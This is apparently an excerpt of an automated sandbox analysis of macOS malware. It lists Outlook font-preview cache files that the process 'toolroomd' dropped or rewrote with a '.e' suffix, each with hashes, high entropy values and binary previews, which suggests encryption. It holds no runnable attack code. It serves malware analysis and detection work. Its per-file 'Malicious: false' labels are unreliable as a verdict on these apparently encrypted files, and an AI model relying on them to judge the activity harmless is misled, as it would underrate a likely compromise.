SHA-512:	FAE5826FD776F672FC5E0A75D1ADF56510F33C31AB57D7D1E33B2DC1E40EBE7F72A86ABCE6F6382FEDFD59A62D5EA3255CD027D03D198A4DED1241887D7BFE7D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a......[..)..9\|.E..U.L...SA>..=q.c......'..E.....f...V]....z... ..n...U....W.f..1......8..sd..+..#..w....1...>~#2R-.-5"s..}m........C.%....V.vY.'\|...,..s.wJy...;&.F49.r...4W...c.V.E.{q....6...o.Gb.`.FId FE/g....F.g..j......~....~<3.."..2..tOm,)_..............?.R..t....T.D3..m.....w...i. .Q..'..o.C."........i.......6.....Wc...M.J..+?4.C.,.(..\.....[.....i3.PC.... r.mP...G..-....u.:gI..I..;.......ws.f.Z-..F..@...GA.........-t....}w.\d.........H..........Wm7.KQ...F.........l...k.....@..h.a..t.G..37.u.6.X..ms../}.....I@..0 ...!..y@Q{.t...>o.....}...Z.i...M1......?&5..\|&.......E...q..l...........g.E...l.#.`k`.k.....Z7.E\.:..&...7E...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Lao Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1714
Entropy (8bit):	7.573679597256304
Encrypted:	false
SSDEEP:	24:E1GMngC2WVggBiOCdBcAZmcP+s1I31lqnfCTZh+IPRinJ6ppLWLan3/jcEb6qfBT:E19cgkXXo2fCTiJ6pBWan3/13BGNpq
MD5:	902EEB0A8D92889B89F9C3DF9E039D88
SHA1:	E4D1DBBAB99369A292012F46F2902553E87FEDBA
SHA-256:	89F1A90F1B387FD173F88D6E38DED4212D2988F2EC8BBF14D88912D45E6FF5DA
SHA-512:	05A571478079A3983776D66DD4D7519560B489FE74F2D850248C8DAF188F891D697EF929DFFFEA99268F78055FA95AB09E797C4BEB4C443C2611BEE098B9E8DA
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a."O1.m.W..ag.[......R..36.\|.....-..8..H....H.5.d.;..}$...l..c.....I.v...5..m...7B..;^..,.bab.D\.o{@P... =.]...g =.]...g =.]...g....2.?.!.)..8s8.s..v..G....(t...<..I....l......Vg.....VEi"..K...R.J.A.<..L..m!..2..,...GwE...@..8!3..p...;d.....3N....6...l....i.rBz.T....J.T....%......I.Z3...LW?......a.g.X..]?...M.4".../..j.%......Q\|'.p.`.a..Z...a.W\|O.D...4...LX6.CP.(.y..^u5.K"B..J..........W'...F.xb.......l..2miEu.L.f..E.. .T.....Y.......+.{;..n.,.Z.h....=GN.R.....g.U..2n......h+...P..v..c:.[...l8.5.o..v..?z...IJps.A..3.C.&z.-I.....n.wJ.Q.+Au(..Zl.>ilwu.u.#....H.Ph...n8.;....P..h..K>N.[.." .........=.G..iU....-.hJ.u.3.E.h..f3...N#......GIcN....a/i.j....FB=..M...n..S......].b.;8....av1...R:p....FY...,$Z..CJG8....>$..^j...D?..O..5.h0m....Dj.5.4...a]5$..WmwZ..;.F.{W4.Ji..;..........Y.h!E@jN.l..X...`..znx...`O7N..e. .....H..U..v{.3.9.4I.$#.....M..#.$.X.a.3.U......\|O...K...Wb.D.dm...g8...Y.%.Z.....b.cH.{.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.LathaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	7.162618410155283
Encrypted:	false
SSDEEP:	12:WvyOHeY9i3J1DtqFVQ70IEVRwohJnUXCF5ukU3N+6fZhv7+7xsewLYTc+qGm7:E+Y9i5bGjPRFAd3NV+tsePc0m7
MD5:	B305C15C3547FA12D9413A2D032FFCB7
SHA1:	6B6EBB4325E72F114D89FB160F7E5AD5B0D30123
SHA-256:	29D9851448CBC157F0EA68D7DF6E33E9A3CCDA21CE7B8F9B4D3243A05EBB3696
SHA-512:	EB24C3FBEB623E9296E389D2A751A5764326745C1DFF99D4D9F8721C0802B49CDDB90A3C5DEF560A217DFF22F24A898821A93B5825352C47792EC8BFEF047BEB
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a\|..........x..I...1..Nj..).....%........... ...E.~...O..K.......={..'.@..Lk.]}.5=3.H...`...\..Wo..a.HU......J.;7.....Ly.U..H.61..r..p.b...:O....7.4.j+.\|.}..R.x8....I.C../.aat...e..d.........d...<vzN.WQ..W=.Hb.\|....CR.p#>...j.8..8a..)......z..R."}..].R~....y .Z....h....R.8.Z....Q....,.......,...N.{....I..;D.&..2".K..6.\|.C....X8..m...C.QTn..F..ri.t....9...(.Wi.dD..M.+.............3.Gu.2}.#~N.......2..VY..,.m..0>'....SAs...}.]....`.uS\.E.6/.a.{'.R...V..7.;.#..I:v.....0...b..K<...A..'....t...hp.......4"...I&..Qq(.M.uK.-.h.e=...S...f_4.........g]9Q..\..x.....-u..IW11P..TJ.q.....yqq.m..J.\-..uX..q...................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Lucida GrandeRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1498
Entropy (8bit):	7.516969036495813
Encrypted:	false
SSDEEP:	24:Emsq8RlRgE7kQiE5Xm0W2iYFDTNwQCL7R4uolvya7bEzVMcgqq1GsePc0m7:EmsVX5JWIvNwQCL7dQya7QzVMtqqQNpq
MD5:	55C592BA65AF75CA04F4323AE7960C6F
SHA1:	BE919F7AF49BDAEE504CD1C2A7A1DE93C7AF339D
SHA-256:	5D7BD471808FB86F98BCE3A3ED6196550BCB2500B173F8A6812308D97FBEF507
SHA-512:	66B966BB588B248A93E1F946987A62CB14BC8FB3618E73ADEBC21A2134F06B88F94E5DB6304D4EE3CAAF5DB090F160EEADF1E8A74D33C8ECF67A491F5D0FBD2C
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.X_d"..Q.......RRyk.cd..........P9x..U...3...'..].jV...`....E.......+.yTC.....WU[X....+..]...k"....T..0...i....@.{..Z....d.q.m..}$. .....&t/+JwO.f.b....B.....r.....#&.......Q...o.3d.v...7...bxeSO.F.HL...7.T..S..6..B..3u\.<........u..l.a.\|S...XN....aK....z....N...b..u......^..a<....<.K....>....ps.q'..=.L+.Q....5...n9.........7..`.6.i.......... E..#N..[%.......@...._h.......K..SD=....`Cb.l.=....kX.4......TJ_.-%d.bhT...4.&.Y6:T.W;`./.2d...ru.r.R._..A^{?...o.cX..P...H...4..1..#5._.....c.g%jD....;0Y.El,.T......\..^.o_.z..\.._J51.A.C....[..Zqg...[...p.2.F:Rt%..7.-wU=.~).....2.W..p....c..#....ojk....E.'...!s2.=?Y$.U..E...]......]95< 4^:.S..."..Z.t.......nq......dO......l.^".C9..\....:.c2......."G;0..x....<....$...../.8..1}.;........~{.......e....? .....W.0.@1.>I.{.)....2U.e..t..:.kCC..(.e.W-.ro...,....rTU..18g...Q..1..@M..w.Fr..{Zt.`../...... ....,..%^..?....&......B.S....<c0......+7.-....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.LuminariRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1490
Entropy (8bit):	7.495082530883194
Encrypted:	false
SSDEEP:	24:EkcYHXU3uG2CTYcKo8byhELS+mjX+Dq/41xrYRO7mxsDYSiO7ztmsePc0m7:EkciBOTXKoZhE2+25/41xsRO7mx0/tmu
MD5:	8F837C5CA271CCDD137B1CE49CE5F9C2
SHA1:	24238574260584FB0FA40A8183831659B7B98A86
SHA-256:	75D93A69AFBA48BC098CCF9D248CA5B5C5ECEF21419843D2986B29A288BF1757
SHA-512:	C2FC18056B1CF0F9BF9DD0E39AF7F0BCD9F8251A2BE438100626A22ACFB0994A354CD00B799B3DECD163961647BA3DA057B2A87A3EF51770146E3D3B56675E58
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.ScBU....{2c.x.)W.)T..dG._.m.K.{......J...........a...$RS...+e..B.....P:.{.}...3z..k..p.L._.....a.o.N..C....1.....4"...&...x..T..r^..q6Ta.T.G.....A..h.t...R.....p1%.....S~..BP.k.t,.Ki'.B1......jBk.x..Px=...]v.wK.jj...n.NJ.M....E...d.I.,.K.Q...j..cG.U..T.)v.B\|....&\..[.d.wv+@.....\Q...%....:.....h..S&..Ky..\G.kN.p..d...;...O...6cy..7..Of..Z.G..3..nr.....g....K...d...ee..+..y.eYr<.....O...G].........X.s....M...o....l....7..'.7'8.5..6.$`...g.6TiE.^.......R^0i.k.70..+..:)....0.S...]...O.....Q0.FN.W..l...kW.w.U.......yd...h.<..q.1.`.s~.{%.>.M]..."'.._uW..uu....?..@..k.hX..+~ -..z.K)W..+..<#..z+3b......%~...uQ.F..u...V.......K.L2..}H..-..A@..^{n.....Z..0.v%1n.7\a.~BH..l.... ......`0....c.^..z.Q..u..j>..0....7..b..G..........$.....I\[B..WD.J.f....Eu...mkZ/;b.C.g..[.5.e.6.N......Z...~.../.".e..a..G......al..lL./....S.m..u&....u0.!/..ay7.X#R.~....w..P.q.>.Y.8G.Yh..x:..yG.9^Da....^.).`

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MS GothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1474
Entropy (8bit):	7.487485672280607
Encrypted:	false
SSDEEP:	24:EoCavHGCdz2p13O00GOu1hTh/1MoUaZEKikUwTKJB5sePc0m7:E9auCdz2p9+ufh/1Mii5Hf5Npq
MD5:	88F9284B61A404A36CAB7CB6C90DD017
SHA1:	AB6B0036487CF83EF71B4CD650A2435A948B5358
SHA-256:	EBF4EB6EB5D99D2AE522F6B4BAE8BB3DED2456AE83147B1A938239931C349A05
SHA-512:	E6ACA70B7AB132886A1A45D29397F20323057694E5CA702A92A1F1BA36C6155EE847D11E6D3F962F0FCF9AD04BA5581741F56FEC564A14DC12F871B1ADE63C5E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..W:..\.HL...vG!..9.5...E....-...X../.C)...6c..3.u.9.....;....&...C....r..x.....4a!..[.sv.....].....@..v.\|...D........L..b..q.......P.&..E..l8TB..V..z1.......\b9...1r...^Q^O...........'o2..I..............x3...)@/.Fnu.p.>o7....J.c.o. .1,6}.dkJr.O....DGIMO..)..z....].XX>y.F..\P..T...Xd.Y..H...Y........".x?8ME....Z........."n55'z...Gf...s...t.....T.U1=M0....5V.......] .....+.x....)..'C...;.O.1.$....edW.].sK.#>..g...&%....E..!...'.j.h.L...S.jU..xa.uVZ.....Y..$h...6fN.a.....W>....sq.w....w..W...ae..\..\|g@.....Z._'..OhLA0.......`.g)&z........Z.`J....l...@.pEm.N.,..."....n..C..T.X..$h..P..zg.!.:...qAr(.{h...U,.a.E..T...........Y..Nt>0.Av.o..n.X+[<...#.:x......k..O..z..U.~7..{SeC.\|.(.6...):D....r.a.\t<.}.n.T. ...\|..+..xO~..d..E`.!....}.t....C!z..Q3QI...i....k.%@C.b....B.`....Q\;..mJ&.~.wUF.Z>q.,....Z,..v.)...".s.Ut.......U.=...zH...Cfc..]..2.`..&\|.,....=.V.d.\|..x.....-.+7vM.B..I..]..Q.H...T'/<.N

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MS MinchoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1378
Entropy (8bit):	7.465370699777547
Encrypted:	false
SSDEEP:	24:EhVI0qtYXbP9I/iSIHU7u9AGqNIPceFdONX8tn3fHowRI/gsePc0m7:E3ITtgb9I/izHUa9AGqNK/+yP1IYNpq
MD5:	2B2CE50CB37DE0AC95A191783080FE5C
SHA1:	1F187EACB71F11C8E6063DAF86D8EECFC317965D
SHA-256:	E1E0D1CD3798145E7CD96FFE38DC690095B46E021CCC057B429A5124918A574E
SHA-512:	E7CB440AFC0576066A0BBBD1C1D6171C32C32D6CB6D87CBEC19A3B0248D23016C090C9BB93F0C321A358DEAC06DE4BB30A598B568DFC30AF501DE8FB3D98A466
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a[.g.s..YN..)...?.#..Fr0.G3n...............X..G.n=..Ty.vw.....%..Y........%..+.\3....k......q.u...%.E........^....A..o5V...7?.F.p.C.:.-......N."..qv0.7.9m@.p\Xuf%.u......8.K.,v.WrJen....Q8.^..J]..(.\|..T.......y.......6s..v...._....?.]....#..!.....WQ....r..5..6BN........O.$.....4>.. +.6.>E.[\.....7%...8[xx....l....q.<..k4.F=.Z...R+..$.k......-,.F.I...Z."...>...JCb_y..]c&.To......`.$...T8iF.\...^..49^..._..7....."Z.. ....Cs......x..&...'.+...T.....K....`..?..F0Zz..E.....vCJ....[...F.1.<.....P?D.."..A.....b....?....9`.:.I].....W..w.=.8..s.c}.{.{..:.`.v..J..q....~...Y{Y...+...+J..([.....P...\|)2..{.~...6<8...W..*.y....e.P.Q..9..lb(u.........L..s.......MlPJ,.%....qu..ba..:L.r.ZO..Y..ro..@{. ..,......fN.n?..'c.W...,b\X,.9tZ.B,J..5.{gqD.xg.',..[..H.-.\|....Pba.t.G]..x..i.cL.>O.A..l.&..].1...R.(7..AI-S<a............er._.t...].Hi.]..S.=R.~.tE..7.MR.Zw.f.....6z>..I...5..VR..1.W...3...hz.4k$.....n

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MS PGothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1546
Entropy (8bit):	7.500563037836784
Encrypted:	false
SSDEEP:	24:EfRIH3tg+9r15n607eyhgQp7shcVrTrh0OP9ASZxrUw5kIYlFZsePc0m7:EfiHdg21E07yQNs69Hh049ASZClnNNpq
MD5:	5B9D5556E449E519979ECD95034FCDFE
SHA1:	269DDFA5D806E69317E706C822498FA705013266
SHA-256:	D11D6251A0E313875896AE81F996389DE8AB42FE699F0700293A8C6849976CD7
SHA-512:	A34D436B81397F8D02522DFE0A1F18BB9D79D9AA592F75EC7434F898B12B03D304D17BE78739663866E7CED21ECE144D46CFFE843002BFEF5D03B8AD92A0D281
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.......+.%.WS.V.`......ga.^.e.r....+b...faq^.[..O.U2...Z.v..........i..v...I.......B..A..b....x....q.......Zp._C0.....L.X+g..!.$.......';..J=.....E.P&.!i-...K'h......].L..9Q@....w.....}.6.zs@.q..$..Z.....;..".T...5.c!#..NG+...{...a.n.K9.dm..:c.......9`.s..eu3.A...Y1.>?.4.-R..h.k.y...ik.Q.8..~.k_..D.,.M..v..7.sH0..2^1\..............+.).!..[e4Y..y........Q...rEN.f.....D.....D....;;.....g(..(....y....V.....w....sm8...&....$~.....C.=p.g...2.u9.Q....=G.....9t..A]d.y0..]..Rs.......q..H.^..7. ...H.V..9.f........)..nA.neW.^AZt.o..r.7.gF.=...Ih..K.<[..e.[.F..Z\|..........I.`...H...[..Z...:.K..._..?.f.09P.$.6..."........[.aB.0....................o.).bFFy.f..FU.......1F.K.p#...~...*{%WN....^E...zc.TZ.Q.....0......r....l..v.K%.......<.......Z6....a.`.B.C.....+A..b...F..[.vg....v....a.>.....r.......j..q..N.....G.5.IQ^..G..#..U.^.............1.9..r\|s1....-...?).K!.9I.<..T%.....6XOv.g.....?b.:).S.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MS PMinchoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1506
Entropy (8bit):	7.505305003848134
Encrypted:	false
SSDEEP:	24:Eu2m576ADi42hWnsPV7WPuRRdxzvYvntDiisX1/EgMuOaruQZL6sePc0m7:EVmhDi3hzN7QudxDwDiisXagnrugL6Nw
MD5:	168CB9FC4F4E42BDBFDE123F27107BEC
SHA1:	329B03AFFA6890F0A87972CB4F0856B65CF29385
SHA-256:	07A1F03D3A5E4753B60C2369C6E0B0642B5E2B81A71F2F5C3997784F8993907C
SHA-512:	248722ECDC2C53CCE9354E84382A512E01D33712D2E21DAFFBD93B32C546375DE0205582DD135067D4638C126A6AF7E82F08C7D5FA984E027DDEC0FA0F9D116A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a........EP..e...~V.Y...a&........^..Q.@.t{.2.gz.....^55m1C.).l..S.."dN...8..1......B;v..Y.Z.44...x.....IJ[.M....J..`.F .A.g.U8...;/M1UcOl.Q..]..io...I.....n.....N.....MM.......M.N..X.......x...ss...Z#.\|0.q....L.Tx<....D`'....4........{.2.....,+\.87.y....`~....H...>4.1M..f.y'.D.U.f....2....?7o.}JEh.....)I...4..;...z.....@<......@E........tg.........8.>...x.......p...pT..(.Je+.,.\...-.....@...8....&.c....FoA[.".(.....5T=X.W..oI2z...z.R.W.^.t..1k.NQ.iy...`.....4.p.L.......+.S5...AW..B.7......g.l...Z.I...e..;.T[;......-.7.tfrH......6A....B..#......E..}..b..)}.J../..#`x.........83..@....F....[..jE.<3.M..0..0tv....(.?g.s.1.....`v.K.d:...&.\awW...t..;o%.~...TOM..sY5a.....'..<ew8....cv.Y..$..; $...5=..\|...."5b.......9+Z..L..\|.1.....D.l...oHW.n...C.A...,..A..Z.O. ..l.@._!yC..jl.BpG.Z..]...y......&+b.C....F....x...u...........h/8L!.....\|..!.O.."../&.sH.....e^w.d.u%yH..>i.$..zP.9.C..t.......5.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MS UI GothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1594
Entropy (8bit):	7.548139145733058
Encrypted:	false
SSDEEP:	24:EXMDDTKwIA9fgCKCo/NiVO1Chu/XP7DBtp66owSvp1Pz8sePc0m7:E8vTR/9fgS0NiY1COD/gxz8Npq
MD5:	4FB5A7FE178D3173B9F1155B85D34055
SHA1:	25BFAAEF51ED30D90427DFB8F25F0C099C91635B
SHA-256:	F0383A6E96D93BFA23A09E4E364E6E2F83BEF2839C5F36800F2B9FEE016304F5
SHA-512:	403C6ECB1ED2516C2A1065A961C29A3362A87D626B0006BB1C68A7115EF733F368909FF34AC4716CB1E932B866BE873A06959B280644AE25C75F2D2578823502
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a_....7..5...5.N\|.J...;\|} ..)t(...S.^..,w_bhY1)+.}<..8f......4.._.j.~.c......8E/E. X.....,.......,I).#Gk..;2..w..t..Hx.&/....q...>..-..y.[7...n.........C(O....,.{..=.%z1.<k<..,.!...g..............ri....n.9.2Fy.l.U...B`...... .S.s.^d...B._......NC..8.0..L.D....\|...cv... V{yq.....\|..;.7.....~..g.$...l.ot.W...obeF(.p...}&..1...%l.2..Y...I...e..).X.=@;I...A.e*d".A}]...y/...E..M8.gV.A...p.(M\.Z8.x.I.......;..#y.GJ..[....2;..+r(b..{..z..n.8..%.r..X.:4.1....p<S.%ApIt5..F......L....}-].u..w..8..S.!Y?z"..Y.`2.F...ZH.'+....{=l.@U..Ij.Y9.n....D..^Fv...tw..v<j........#.I...9.._.!...~5..........9.].H..q.....>.!B$r.....H.w7h.oa..M....R3g.Km.n.:{.S5J.H........^.~...l....a....w.d....m_dz.....H...D..'..5c.\...&nz...?S{...E...kIB8~..H..[.....Ga...3...5..Y....\|r.-.!bM.c..@jD..q!....phr....?.^.m+..!..2......E.q..c...V..5.h..0>:...SG...iCf,.G.....:...fW...&...._.qxJm)..0.Bi..f.Z....,....,o.'eY..._\|.R...!..<.H........}.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Malayalam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1642
Entropy (8bit):	7.560687892582695
Encrypted:	false
SSDEEP:	24:E2JrVVrmImahaI91DJZ7I2ucQQFUbLEKb6x17zioKsePc0m7:E2ntmIzhaIXDQ2pUbSqNpq
MD5:	154C8E8892EB1DA10E1CDA7C23FE0D3D
SHA1:	64EA4320D7538D6B61932C2513BFE353AD8A4300
SHA-256:	AA90592A3588EA4A12D64A64F9AD1DF0FFF1D949ACAD72E8118A4CC95DBCF44F
SHA-512:	3AB0B8064C4C3D5DC350BBDC5BC658F661A76918743D73435D1A16ADE7D9522EAC98674DF3B4A62C6F34D2B907919B4C9B4DE9C5544A00F030918F076A113950
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.EK..x...<..o....<9.....X.1......m.H.G..j...@.....A.o.f.\|../j.M.....V.#u...\....._..X..k...{,.j.g\.y......]7...I...............t..r.HW....el.;FHS.2.W...C..#{.+'..C....C. Y.!.;.-V.@Q....KA#.+.I....i...I...nZ.0j#........n...'2..T.U3....6..f..~.&.n........kD#S->...~g.f'zGn...t...=.....&....WBWV..2..eQ...^i1cH.(.L..s..Y..ei7.Q...U.N)(.O....Wd.pi..tZ..z".?......y..(...-...X...&.'.<....Db.....R..](.B.....s.v.i.$_......!<j].^..1N.0.{.."B....@/.LbL#.#."......[.3..Y.>b..}%...e..l..-....9........,3...e.[..x..T9g1.,..e9v....v...B...:....c5.yil6......$.0.u\|..B{..1!..p6.+..G.S.\|...@.hH...j.......D....Q...:..t...?.(.......w.w.....h.....o!Ex.....hI&.H.-.f..,."....a+...(.E.u7...+TY6. ,.'.!.:.RCE...<yY.1...f2..4.y0......6<...z.._....T....t.V..gH.......<6.mY.G$.+L.Y.[....r.3.@.P....g......)]..J.9....4..o4.D...u]....y01.6...Z;.6..........j.>.\.h....0....u!....Y......m..?d.w.H.y..Br..5N..I.r{.>MI9....L..v.x.G..P..Pm

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Malayalam Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1914
Entropy (8bit):	7.628415703657867
Encrypted:	false
SSDEEP:	48:E3dYRDPlHZL+rYBjafeQ9PGFzr7aG1RolsgFGLIJNpq:iKBPlHcfAjkl/GLIJu
MD5:	8238A0735B2B7C60FCC7C2F516D3C166
SHA1:	B14FAA6114253E376F54A713470882AB6E75CBB2
SHA-256:	FA423CE4061B1460D8658597908E3266E6674923C762CAE35F38E08C7C5511D5
SHA-512:	31D7FB3192D2B89FFEE67EEBDC2BE0F8B7B63519C06EBC7B0A5A6AB2E15C49A12B653928E22CDEF02037A80EEA4EFF4F1D5CEC59F3A79561B4C868751A00FF5E
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.[...0=...n..Myh..!]s."L...M.X....I..9.".,..e.%SS.....cu~..H....c'../.z....4..;.7..-.m....eK.&..g..B;.eOy7v....7.....V!.....V!..x\....r.?(+..!.g.2.."....O...8<.M.>#........m1o...t.C.{...t.:n.;...)i!3.~.\.E....v.....T......N.l...A....a...k......Z..\|.sO.p..s..3t...s....B...>...V..l...A.A=..}..RG.....QX.X......[.Q...0.`B.I...l.y.d;`vI/..jqMU...w.;.JVY..l..<.D..W-..5..W.+.{.....:.=Z.].@V.b.vM.......uF..+yk..b....{DWl.S,2.>~es..;q.pG.k...J.m.....UR..1.d...V;g.QQa./...L......G.>......[J..5....F..2).J....n......s7.V6bb0...}..jN.dUz......V~....o'(..PO.^q.}..2...y%.....-'...6...A.....7.)....^..afqa.\4H.\|...t.....$...'.].(...n8.......g..j.n.9...D..<).nI..D..7[.....Hr%.5._...@.8.\|A.p.+.<m.R.L..WM.n0.......V8):.E.F.)r....H.....VV{.....%ka..)..J.EUZ.*"7,..........6+T.X&.ORx.f=...s..T.1.?.I......Vz.B.......'.0$$yF.$.M.VI.qx..!.$.........0....<d..&.aa..8.%/...\|.g.5:.......=..B.$......>T.b..3...........

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Malgun GothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1722
Entropy (8bit):	7.602464637051783
Encrypted:	false
SSDEEP:	24:Ehw7WxFBTAJEY4qTXWgEND0T04yazjkZ28AhuI1ItQlUl+AKbsePc0m7:Eh7rTbY4yXDENoo4y1Z2jhPddAYNpq
MD5:	A361D1DAB2D913FCE02741876433322A
SHA1:	68B53530F3ACBC81892A5A83FD8B63C26BAD45BF
SHA-256:	C2DAC3A324C0871B79F1D0A5B32195FA6A444050AD2B2944F299251F5106DE9D
SHA-512:	11472B82DD0BD304DD93B68C6097FECCE5899BC1048A2210DA22AA2F2407B814E1BBE2181A22D852C887D0C1C21EBFA94EAA3C2954DAC2B89A131B03D5CA2F07
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a ...f\|S..9qz.Ri...".a...J...._9m.F.I.D.Z...x0....N.^K...'..0kd..:.......;...Z.k.1..+5........K...L2.Ag.l(o..I...m.....U.@.I....%....n8,Q6r......]..]Q..5.^......].X......~p....OO6#....ke.bYt}g.....q;.h]^..q..+...'.D..B.:....qu..Ia..{.....M..$.Q.G.I?.....#.j.M\|.$............:3.8.W.../....2......1......$.......ufI(.&.Y..L./..q8.}T4..V..?N9Z.U!1....3..?]..p...n..e..j..@...'..6.5...#.<.........L..v....:y'....OLFe:1t....\..h...iu.Z..QZK..}../..s.Y>....b.N7.ZnEf..8..Ka...((...L..=.Zg.7.wKf........<...W...T8.+x...!R1....e.).q...#j....T.?...e.....a.2k..c.1.^..3..\..\S........Z=.O.........v.4......$.k...8B..e..#.Q.....^.....mUtx....;.M..2...5@.eK...q.P.sx}in......D...?.j.)%.....).6y.9.7.A....4.....f...X...u...N...9...8c.>..0..4.....o.N.H.Fe...&wk.....a"@Qr...7\|a....V.`.;?&_]g;....9{.m......X. A7...r.Lr!.0.....I.t...U....oz.(sLY.<T........K.j.:A.....d...b..4Oy..Y.>Iw:..S.O..zr$.Gn;jw... jw.;H~..2:

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MangalRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1218
Entropy (8bit):	7.348025519725711
Encrypted:	false
SSDEEP:	24:vFosuHu0EM2ndGfSc4al7LOMu9mgCSY07PUbl0Q6wzYYM1sePc0m7:vysGnh4+W9aSJrGl0Q6kYYWNpq
MD5:	4062C38E18C98B341FA3D52EFF15D695
SHA1:	5B79BF684C32A5156DDFC494746A3C730705E425
SHA-256:	17DAE5EA241DA69EAED498A07F90589DED3951496DA74158A0BB02DFDE8B99A2
SHA-512:	E15A875482C2B8955BAD8439F963B8B419C92D84764860A5AB92293F01A41A04632124FA1BE3C3E1AF6BC8720422152018D3F3310A027454810F5ADB9F126B69
Malicious:	false
Preview:	.<.\|.....f.A..s)F.2....V.....>+..Gx,.i .Y.a?../....2I....b\..@/0..\|.A....9....pY.7.Wej.q...V.....U2U^.q'....."..hh.T..'vZN.....}!N7...Jz....i..............Z...R.n.C..H....bWpO:..\`..F....V.y..Z.......+t\wT....2..........V...h..w=.4&g..........Vt..<wj..^...0..........G...v...#@..iM..>.A."h.X.mZt.3...f.2x.bD:....._2.?..=.#..."D:.(...eFk<....N2...P3+.......s..W....q.\hV....T....~.X....,.4N..R.....Y..Cjt..G.N{...q....Z..y..\|?I5.n.98..v.t=.-PB....:.2.`.c.D.R.._..#.p.G.{a..G..r0I].s.nz.^...UM....1q.....['._.Bt.[.....$_rs6".U...HX6.k..:B.....T....~.C..X.k.......m/.b.v.-.-...._..E.H..a..A.kUS.U.....xu.A...L...k....^...Y...w8.q..8A.r1/4..L...<7U@..q..!.fA.#..'(=..RW{....{...j(..I..>........+....."..oD....t.x...}.{......\.A=.....Bu.kx.. v.....//5-$.v..m..cR.?x<.....S.m4.T.00......[.<"...lT.q).8...acr.....S..y..@..../6.........k#D3...C-.!-G.....U..u....h8.W...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MarionRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1186
Entropy (8bit):	7.338960215864547
Encrypted:	false
SSDEEP:	24:ExHlxUiGS53hrkQvDv5P8j5LF3ok37yIx//sePc0m7:EXxWy3pRcL1ok37yI9/Npq
